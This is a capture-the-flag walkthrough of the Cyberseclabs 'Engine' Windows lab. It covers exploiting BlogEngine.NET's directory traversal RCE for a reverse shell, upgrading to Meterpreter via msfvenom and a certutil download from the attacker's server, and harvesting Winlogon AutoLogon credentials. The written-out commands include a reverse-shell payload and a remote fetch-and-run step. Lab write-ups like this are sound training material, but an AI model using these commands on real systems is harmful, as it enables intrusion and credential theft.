Premise

Note: Because of an issue on the lab side, the Windows system's credentials did not appear when I re-recorded the video.
In this walkthrough we demonstrate basic enumeration and exploitation of a web server running on Windows. We then find that the system stores credentials in the Winlogon AutoLogon registry values, which lets us escalate our privileges.

Machine Name: Engine

Difficulty: Medium

Skills Learned

  • Web server enumeration and exploitation
  • Windows AutoLogon registry credential harvesting

In this video, I’m going to walk you through how I tackled the “Engine” machine from Cyberseclabs. It was a fun challenge that involved finding a vulnerability in a web application, getting a reverse shell, and then trying to escalate my privileges to get full control of the machine.

Finding a Way In

My first step was an nmap scan to see which services were running. It showed an HTTP server and SMB. Anonymous listing of the SMB shares with smbclient was denied, so I moved on to the web server.

The web server greeted me with the default IIS page. With no obvious directories, I ran a directory brute-force and found /blog, which hosted a "BlogEngine.NET" application. A self-hosted blog engine with a known version is a good place to start looking for vulnerabilities.

Exploiting the Blog

I used searchsploit to look for exploits for BlogEngine.NET and found the "BlogEngine.NET 3.3.6 - Directory Traversal RCE" entry (CVE-2019-6714). The application loads a theme's PostView.ascx from a directory chosen by the request, and the theme parameter is not sanitized: a traversal value makes it load, and execute, a PostView.ascx that an authenticated user has uploaded into the blog's file directory (App_Data/files).

I downloaded the exploit, which is an .ascx file, and edited it to set my IP address and port for the reverse shell. I then logged into the blog with the default credentials admin:admin and uploaded the file through the editor.

After some trial and error I realised the upload has to be named PostView.ascx, because the theme loader looks for that exact file name. Once I renamed it, navigating to a specific URL triggered the traversal and my netcat listener caught a reverse shell on the machine.

Getting a Better Shell

The initial shell was unstable, so I swapped it for a Meterpreter session. I generated a windows/meterpreter/reverse_tcp executable with msfvenom, served it from a Python web server on my machine, and pulled it onto the target with certutil.

I then set up a multi/handler listener in Metasploit with the same payload, LHOST and LPORT as the msfvenom command. After a bit of troubleshooting the payload ran and I had a stable Meterpreter session. sysinfo confirmed the target was running Windows Server 2012 R2.

Trying to Escalate Privileges

My next goal was to escalate to Administrator. A common check on Windows is for credentials left in the registry: when automatic logon is enabled, the Winlogon key (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon) can hold DefaultUserName and DefaultPassword in clear text, readable by any local user. I used the Metasploit post module windows_autologon, which reads exactly those values.

The module found the administrator's username and password. I then tried to log in with them using evil-winrm, but I kept getting an authorization error. I'm not sure why this happened, as the credentials had worked for me before. It's possible there was an issue with the lab environment at the time.

Even though I wasn't able to log in as the administrator, the walkthrough still covers the full chain: finding and exploiting the vulnerability, getting a reverse shell, and recovering the credentials needed to escalate privileges.

Commands I Used

Here are some of the key commands I used during this process:

  • Scanning for services: nmap
  • Listing SMB shares anonymously: smbclient -L //172.31.1.16
  • Searching for exploits: searchsploit blogengine
  • Setting up a netcat listener: nc -lvp 4445
  • Generating a Meterpreter payload: sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.16 LPORT=4546 -f exe -o blog.exe
  • Starting a Python web server: python3 -m http.server
  • Downloading a file to the target machine: certutil.exe -urlcache -f http://10.10.0.16:8000/blog.exe blog.exe
  • Starting the Metasploit console: msfconsole
  • Using the multi/handler listener: use exploit/multi/handler
  • Setting the payload (then LHOST and LPORT to match the msfvenom command above): set payload windows/meterpreter/reverse_tcp
  • Getting system information: sysinfo
  • Searching for AutoLogon credentials: search autologon
  • Using the windows_autologon module: use post/windows/gather/credentials/windows_autologon
  • Logging in with evil-winrm: evil-winrm -i 172.31.1.16 -u administrator -p <password>
  • Querying the Winlogon key manually (AutoAdminLogon, DefaultUserName, DefaultPassword): reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.